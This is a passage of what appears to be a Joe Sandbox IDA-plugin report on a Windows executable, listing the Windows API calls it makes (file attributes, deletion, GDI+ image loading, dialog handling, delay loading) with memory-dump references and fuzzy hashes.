      • Part of subcall function 00CBD0E0: _free.LIBCMT ref: 00CBD145
      • Part of subcall function 00CBD0E0: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CBD154
    • _free.LIBCMT ref: 00CB9660
    • _free.LIBCMT ref: 00CB9667
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
    • String ID:
    • API String ID: 400815659-0
    • Opcode ID: 1179616e079012795da90f227714b16f9de97b5cc9755db6ef2563573fb9796c
    • Instruction ID: c0de008ab3f13b18151c2c952ea6d4c483902df256c7783768540d99d0cdb678
    • Opcode Fuzzy Hash: 1179616e079012795da90f227714b16f9de97b5cc9755db6ef2563573fb9796c
    • Instruction Fuzzy Hash: B4E06D92A0A91551DAE5327F2C16BEF0705DBD2371F250327FA28D72C3EE648902619A
    APIs
    • SetFileAttributesW.KERNEL32(?,00000000,00000001,?,00C9B5B5,?,?,?,00C9B405,?,00000001,00000000,?,?), ref: 00C9B8FA
      • Part of subcall function 00C9CF32: _wcslen.LIBCMT ref: 00C9CF56
    • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00C9B5B5,?,?,?,00C9B405,?,00000001,00000000,?,?), ref: 00C9B92B
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AttributesFile$_wcslen
    • String ID:
    • API String ID: 2673547680-0
    • Opcode ID: a28b460c670c044ebce76775998d17c3f748bc89a75fcc85f319ea75c13f1918
    • Instruction ID: 00b4308923659d158998758ceb1922928936baf883072652e4688aa2b96fae49
    • Opcode Fuzzy Hash: a28b460c670c044ebce76775998d17c3f748bc89a75fcc85f319ea75c13f1918
    • Instruction Fuzzy Hash: 6AF0A93115420ABBDF115FA0DC54BDE37ACBF043C5F048062FA54D6160DB31DE95AA20
    APIs
    • DeleteFileW.KERNEL32(?,00000000,?,00C9A438,?,?,?,?,00C9892B,?,?,?,00CC37FF,000000FF), ref: 00C9B481
      • Part of subcall function 00C9CF32: _wcslen.LIBCMT ref: 00C9CF56
    • DeleteFileW.KERNEL32(?,?,?,00000800,?,00C9A438,?,?,?,?,00C9892B,?,?,?,00CC37FF,000000FF), ref: 00C9B4AF
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: DeleteFile$_wcslen
    • String ID:
    • API String ID: 2643169976-0
    • Opcode ID: b63360d3a2ec223f0255bd5d6f00d150ea22e62eaf6e9d3aa3b8e34c0d436fb2
    • Instruction ID: 5c645a660226618fc62646229e933ff796909e763ff523b42704b22971e84134
    • Opcode Fuzzy Hash: b63360d3a2ec223f0255bd5d6f00d150ea22e62eaf6e9d3aa3b8e34c0d436fb2
    • Instruction Fuzzy Hash: D4E092321402197BEF115BA0DC45FDE379DBB043C6F448025BA45D2091DB74DD85AA50
    APIs
    • GdiplusShutdown.GDIPLUS(?,?,?,?,00CC37FF,000000FF), ref: 00CABDA5
    • CoUninitialize.COMBASE(?,?,?,?,00CC37FF,000000FF), ref: 00CABDAA
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: GdiplusShutdownUninitialize
    • String ID:
    • API String ID: 3856339756-0
    • Opcode ID: 8cc1faa100c07c5be44bb80b5dddd21aacc39795399934104b178ba822aa39a9
    • Instruction ID: 47d96e476bdbe491f2c994e53bb60b3d62e1a9e6d4c01ead016f46f369a57b2e
    • Opcode Fuzzy Hash: 8cc1faa100c07c5be44bb80b5dddd21aacc39795399934104b178ba822aa39a9
    • Instruction Fuzzy Hash: BEE06D72604A51EFC7119B88DC46F4DFBA8FB89B24F04822AF416937A0CB74A801CA91
    APIs
    • GetFileAttributesW.KERNEL32(?,?,?,00C9B4CA,?,00C98042,?), ref: 00C9B4E4
      • Part of subcall function 00C9CF32: _wcslen.LIBCMT ref: 00C9CF56
    • GetFileAttributesW.KERNEL32(?,?,?,00000800,?,?,00C9B4CA,?,00C98042,?), ref: 00C9B510
    Similarity
    • API ID: AttributesFile$_wcslen
    • String ID:
    • API String ID: 2673547680-0
    APIs
    • _swprintf.LIBCMT ref: 00CAF01C
      • Part of subcall function 00C94A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C94A33
    • SetDlgItemTextW.USER32(00000065,?), ref: 00CAF033
      • Part of subcall function 00CAC748: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CAC759
      • Part of subcall function 00CAC748: KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 00CAC76A
      • Part of subcall function 00CAC748: IsDialogMessageW.USER32(000103D6,?), ref: 00CAC77E
      • Part of subcall function 00CAC748: TranslateMessage.USER32(?), ref: 00CAC78C
      • Part of subcall function 00CAC748: DispatchMessageW.USER32(?), ref: 00CAC796
    Similarity
    • API ID: Message$CallbackDialogDispatchDispatcherItemPeekTextTranslateUser__vswprintf_c_l_swprintf
    • String ID:
    • API String ID: 3954729096-0
    APIs
    • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CA1B4F
    • LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,00CA0633,Crypt32.dll,00000000,00CA06AD,00000200,?,00CA0690,00000000,00000000,?), ref: 00CA1B71
    Similarity
    • API ID: DirectoryLibraryLoadSystem
    • String ID:
    • API String ID: 1175261203-0
    APIs
    • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00CAB3D9
    • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00CAB3E0
    Similarity
    • API ID: BitmapCreateFromGdipStream
    • String ID:
    • API String ID: 1918208029-0
    APIs
    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CB3D2A
    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00CB3D35
    Similarity
    • API ID: Value___vcrt____vcrt_uninitialize_ptd
    • String ID:
    • API String ID: 1660781231-0
    APIs
    Similarity
    • API ID: ItemShowWindow
    • String ID:
    • API String ID: 3351165006-0
    APIs
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    APIs
    • __EH_prolog.LIBCMT ref: 00C990A7
      • Part of subcall function 00C913F8: __EH_prolog.LIBCMT ref: 00C913FD
      • Part of subcall function 00C92032: __EH_prolog.LIBCMT ref: 00C92037
      • Part of subcall function 00C9B966: FindClose.KERNEL32(00000000,000000FF,?,?), ref: 00C9B991
    Similarity
    • API ID: H_prolog$CloseFind
    • String ID:
    • API String ID: 2506663941-0
    APIs
    • __EH_prolog.LIBCMT ref: 00C913FD
      • Part of subcall function 00C96891: __EH_prolog.LIBCMT ref: 00C96896
      • Part of subcall function 00C9E298: __EH_prolog.LIBCMT ref: 00C9E29D
      • Part of subcall function 00C9644D: __EH_prolog.LIBCMT ref: 00C96452
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    APIs
    • __EH_prolog.LIBCMT ref: 00C913FD
      • Part of subcall function 00C96891: __EH_prolog.LIBCMT ref: 00C96896
      • Part of subcall function 00C9E298: __EH_prolog.LIBCMT ref: 00C9E29D
      • Part of subcall function 00C9644D: __EH_prolog.LIBCMT ref: 00C96452
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    APIs
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    APIs
    • __EH_prolog.LIBCMT ref: 00CAC20C
      • Part of subcall function 00C913F8: __EH_prolog.LIBCMT ref: 00C913FD
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    APIs
    • GetProcAddress.KERNEL32(00000000,00CC4ADC), ref: 00CBBEA8
    Similarity
    • API ID: AddressProc
    • String ID:
    • API String ID: 190572456-0
    APIs
    • __EH_prolog.LIBCMT ref: 00C98828
      • Part of subcall function 00C9E298: __EH_prolog.LIBCMT ref: 00C9E29D
      • Part of subcall function 00CA33D4: __EH_prolog.LIBCMT ref: 00CA33D9
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    APIs
    • __EH_prolog.LIBCMT ref: 00C9E29D
      • Part of subcall function 00C96891: __EH_prolog.LIBCMT ref: 00C96896
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    APIs
    • __EH_prolog.LIBCMT ref: 00CAEB97
      • Part of subcall function 00CA197C: _wcslen.LIBCMT ref: 00CA1992
      • Part of subcall function 00C98823: __EH_prolog.LIBCMT ref: 00C98828
    Similarity
    • API ID: H_prolog$_wcslen
    • String ID:
    • API String ID: 2838827086-0
    APIs
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    APIs
    • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00CBDBDC,00000000,?,00CB80A1,?,00000008,?,00CBA861,?,?,?), ref: 00CBA820
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    APIs
      • Part of subcall function 00C9BA94: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00C9B98B,000000FF,?,?), ref: 00C9BABD
      • Part of subcall function 00C9BA94: FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,00C9B98B,000000FF,?,?), ref: 00C9BAEB
      • Part of subcall function 00C9BA94: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00C9B98B,000000FF,?,?), ref: 00C9BAF7
    • FindClose.KERNEL32(00000000,000000FF,?,?), ref: 00C9B991
    Similarity
    • API ID: Find$FileFirst$CloseErrorLast
    • String ID:
    • API String ID: 1464966427-0
    • Opcode ID: 28eec3ce14d18f9f5a13bcedcef396837e3ea0317090f30ef3ceef954d80bfaa
    • Instruction ID: 9cb586d3d6dc8b8a4ebcb8336e866ce9f9f7ba9eeb5ec5de855b6dc5d8137004
    • Opcode Fuzzy Hash: 28eec3ce14d18f9f5a13bcedcef396837e3ea0317090f30ef3ceef954d80bfaa
    • Instruction Fuzzy Hash: BEF0AE32008790BACE2217B4690C7CB7BA05F15335F018A4DF2FD121D2C7746495A721
    APIs
    • SetThreadExecutionState.KERNEL32(00000001), ref: 00CA2156
    Similarity
    • API ID: ExecutionStateThread
    • String ID:
    • API String ID: 2211380416-0
    • Opcode ID: 6da0ae5cc72516dccc8f59c8aa58615b7b47c5209fb2a3e833593d508450acc0
    • Instruction ID: beeec4cab7d584d06253eb90ff0d587ccc3deb500a12eb3e85f367b09d1cb2aa
    • Opcode Fuzzy Hash: 6da0ae5cc72516dccc8f59c8aa58615b7b47c5209fb2a3e833593d508450acc0
    • Instruction Fuzzy Hash: 5AD0125175546152DE26377C68497BD5A465FC3319F0800A7B709562938B540D86B2B2
    APIs
    • GdipAlloc.GDIPLUS(00000010), ref: 00CAB62C
      • Part of subcall function 00CAB3B8: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00CAB3D9
    Similarity
    • API ID: Gdip$AllocBitmapCreateFromStream
    • String ID:
    • API String ID: 1915507550-0
    • Opcode ID: 67c6c0b1a9f8045d953eebf11179e7c179da5fb7bf356439fdf6af47a3be8cb5
    • Instruction ID: 234dfc4dd2be510ef6d00b932fff6fd9a77c6deae0712d27cdb40cfcc5a108a5
    • Opcode Fuzzy Hash: 67c6c0b1a9f8045d953eebf11179e7c179da5fb7bf356439fdf6af47a3be8cb5
    • Instruction Fuzzy Hash: 5FD0C73061460A7ADF466B618D029BEB9959B12748F008135784195192EFF1DD506651
    APIs
    • __EH_prolog.LIBCMT ref: 00C96925
      • Part of subcall function 00CA04E5: __EH_prolog.LIBCMT ref: 00CA04EA
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: caba1dc15fb1c753da26ef2fdd7c66f8fb1bb884a66f9eb664deecc2074db90d
    • Instruction ID: e9967ede5ebc63a5ee0cfac8c80b57c0319f8d2f4a12a0dadaa0bd2c11c75592
    • Opcode Fuzzy Hash: caba1dc15fb1c753da26ef2fdd7c66f8fb1bb884a66f9eb664deecc2074db90d
    • Instruction Fuzzy Hash: FFD05E71E104669BCB15AB88D4127AEB274EB05708F00416EF411A3341CBB44A009780
    APIs
    • DloadProtectSection.DELAYIMP ref: 00CAF75F
    Similarity
    • API ID: DloadProtectSection
    • String ID:
    • API String ID: 2203082970-0
    • Opcode ID: 9e67b8f7aa2258c0f96b18a8b4e545213921c2b8256fdf6c38010c3a76151dd2
    • Instruction ID: d48953dd84dfe332573e00eb9353d02b2edf803420fb77d7e72c1ca9a0057876
    • Opcode Fuzzy Hash: 9e67b8f7aa2258c0f96b18a8b4e545213921c2b8256fdf6c38010c3a76151dd2
    • Instruction Fuzzy Hash: 32D0C93051425AAAC251BBB4DD4676D22A0B30A34CB400529F255C1190D7748643D61A
    APIs
    • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00CA2E78), ref: 00CAEED2
      • Part of subcall function 00CAC748: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CAC759
      • Part of subcall function 00CAC748: KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 00CAC76A
      • Part of subcall function 00CAC748: IsDialogMessageW.USER32(000103D6,?), ref: 00CAC77E
      • Part of subcall function 00CAC748: TranslateMessage.USER32(?), ref: 00CAC78C
      • Part of subcall function 00CAC748: DispatchMessageW.USER32(?), ref: 00CAC796
    Similarity
    • API ID: Message$CallbackDialogDispatchDispatcherItemPeekSendTranslateUser
    • String ID:
    • API String ID: 3453300979-0
    • Opcode ID: f23082648d143b978c0e519d76614252e9c898c667a4676a616edf7b5b03f14d
    • Instruction ID: ed07cb1d0b487eee9c13e9cda2915e70064a332241c07458788615586c88964b
    • Opcode Fuzzy Hash: f23082648d143b978c0e519d76614252e9c898c667a4676a616edf7b5b03f14d
    • Instruction Fuzzy Hash: 40D09232545200BADA022B51DE0AF1E7AE2BB89B08F005555B389B40B186A29E21AF06
    APIs
    • GetFileType.KERNEL32(000000FF,00C9AA1E), ref: 00C9AB28
    Similarity
    • API ID: FileType
    • String ID:
    • API String ID: 3081899298-0
    • Opcode ID: 0a1f011c3f0c69ef5ec21208958665174e1f1184f53b33e36cae6225a28b9c02
    • Instruction ID: 7990713f4478c00834697c111682d10a2fe8a221ac9132bc23b6a3376c998227
    • Opcode Fuzzy Hash: 0a1f011c3f0c69ef5ec21208958665174e1f1184f53b33e36cae6225a28b9c02
    • Instruction Fuzzy Hash: 32C08C34000209CB8E700A34E89C0AD7723EB623B67B4E3D5C078C90A1C3238D83EA43
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 665f39fdaf68561edadad1a65bac138df682a5405861f1b97b8ef1a7ab887f1c
    • Instruction ID: fe22e48dbeea86a8e39abf375513b976a155d32db0d8383e09b16df9aff56e71
    • Opcode Fuzzy Hash: 665f39fdaf68561edadad1a65bac138df682a5405861f1b97b8ef1a7ab887f1c
    • Instruction Fuzzy Hash: A1B012D127B1037C3BC462A56C12F3B021CC1D5B19330813FF202C1080F4501C423072
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: d8f8d14fb5e71d7ec6f7351fd873395538345bd47b2bf9d48cbd7c20a1eebb73
    • Instruction ID: 0ca98a49e0782c961367728d6590fa8f88d506446f085d28809ba7e7b8bc3fc1
    • Opcode Fuzzy Hash: d8f8d14fb5e71d7ec6f7351fd873395538345bd47b2bf9d48cbd7c20a1eebb73
    • Instruction Fuzzy Hash: 67B012C127B4037C3B8461A56D16F3B021CC1D5B19330803FF202C5080F4901D033072
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 0cd97f2c0011e0306666f10274ae54cee694486e47799882af3b41db74f2ddaa
    • Instruction ID: ec3561fa29f6296243e766a7a6ec02fa093fc06abe58d97ec7ee44334d5ab492
    • Opcode Fuzzy Hash: 0cd97f2c0011e0306666f10274ae54cee694486e47799882af3b41db74f2ddaa
    • Instruction Fuzzy Hash: 57B0928126A0027D3A8461A56802E3A0268C096B19330803FF602C1080E45018022072
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: eae4d0b2fe8af7c679ee8401b0f0c8fc04fad7352edb246379153d5d2ec6364d
    • Instruction ID: 1dfcf99a423746faaa642ae3d8b6b4e0a605bbec89950de9f16b52f5a9a7b727
    • Opcode Fuzzy Hash: eae4d0b2fe8af7c679ee8401b0f0c8fc04fad7352edb246379153d5d2ec6364d
    • Instruction Fuzzy Hash: 7FB012C127B0037C3B8461A56C12F3B025CC5D5B19370803FF202C1080F4501C023072
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: fa91e9895589104cfe8ac7ce043ff665838cf94db29aaf0ccab940b42a8ca919
    • Instruction ID: d25dd4680c86e346494eaedddbde8bb67a0e4a6267149d94a28b42f98d22d674
    • Opcode Fuzzy Hash: fa91e9895589104cfe8ac7ce043ff665838cf94db29aaf0ccab940b42a8ca919
    • Instruction Fuzzy Hash: EDB012E127A4037D3B8461A56D02F3B02ACC0D5B19330803FF202C5080F4901D033072
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: d55f1fbb042494995280e96bd9f3cc3912ff7f198743b4ab0fced4bb16d3209f
    • Instruction ID: bb7f1c1e952f2528cd7123e75eda7879026f3c34e286646ef40cde993b893279
    • Opcode Fuzzy Hash: d55f1fbb042494995280e96bd9f3cc3912ff7f198743b4ab0fced4bb16d3209f
    • Instruction Fuzzy Hash: 05B012C127A2037D3BC461A56C02F3B026CC0D5B19330813FF202C1080F4501C423072
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: cbda7dcc0b406ee5cc42268f9876d5a0972f25d2daa6b31141a9a9622643cdf2
    • Instruction ID: 857c7eafde70b90ac72ad78e6fa37410c9674ef284e590b3e77f6f8b8421e505
    • Opcode Fuzzy Hash: cbda7dcc0b406ee5cc42268f9876d5a0972f25d2daa6b31141a9a9622643cdf2
    • Instruction Fuzzy Hash: 8DB012C127A4037C3B8461A56D02F3B021CC0D5B19330C03FF202C5180F4B01D0B3072
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: d32d0a0060e9486d480cb686906a64a89d244fa1945fde1267acc76b5cdb3e38
    • Instruction ID: 169fd64a5c5a068d2e012c7e11155ec0ebb690634c3441ced3c5e5615db574e1
    • Opcode Fuzzy Hash: d32d0a0060e9486d480cb686906a64a89d244fa1945fde1267acc76b5cdb3e38
    • Instruction Fuzzy Hash: C0B0929126A0026C3A8461A56802E3A0218C096B19330803FF602C1080E45019022072
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: dc3925d26da261f66e9c61d640669c5b7956e5b505fad95544d7c993e9906df7
    • Instruction ID: 256797ff2ac413693a468ed6a1085f24502323acebca1284390376c1e33e19b4
    • Opcode Fuzzy Hash: dc3925d26da261f66e9c61d640669c5b7956e5b505fad95544d7c993e9906df7
    • Instruction Fuzzy Hash: CBB012C127A0037C3B8461E56C02F3B031CC0D5B19370C43FF202C1180F4601C063072
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: b2a352e0fd9c0df045287b1e51184541b817e757638900fdf27d6b21819a2bd8
    • Instruction ID: 8d172cd4997632790ca0a30a3c4565d10b5d3be7cf3f78acfd5cc8be79ea549c
    • Opcode Fuzzy Hash: b2a352e0fd9c0df045287b1e51184541b817e757638900fdf27d6b21819a2bd8
    • Instruction Fuzzy Hash: 7CB012D127A4037C3B8461A56D02F3B021CC0D6B19330803FF203C5080F4901E033072
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: cdfc8df90c78e945b7c0001580693a8bc03671143470534a3e0535fef5d2e77f
    • Instruction ID: 5e36eb8ab51ff9237ac0113241300829fe99fe49b200e611d69763fe4d4d90a6
    • Opcode Fuzzy Hash: cdfc8df90c78e945b7c0001580693a8bc03671143470534a3e0535fef5d2e77f
    • Instruction Fuzzy Hash: 25B012D127A0037C3B8461A66C02F3B021CC0D6B19370803FF203C5080F4501D023072
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 0c49e35415ed3e515ead5613569e4b1af89c60bf73dd51540b955a4f9c9ae81c
    • Instruction ID: e083920e73f185e172965d55b9d4509d367a3382c75fccb5da67a8b2e708aa11
    • Opcode Fuzzy Hash: 0c49e35415ed3e515ead5613569e4b1af89c60bf73dd51540b955a4f9c9ae81c
    • Instruction Fuzzy Hash: B5B0928526A1026C3A8461A56802E3B0228C096B19330803FF602C1080E4501C022072
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
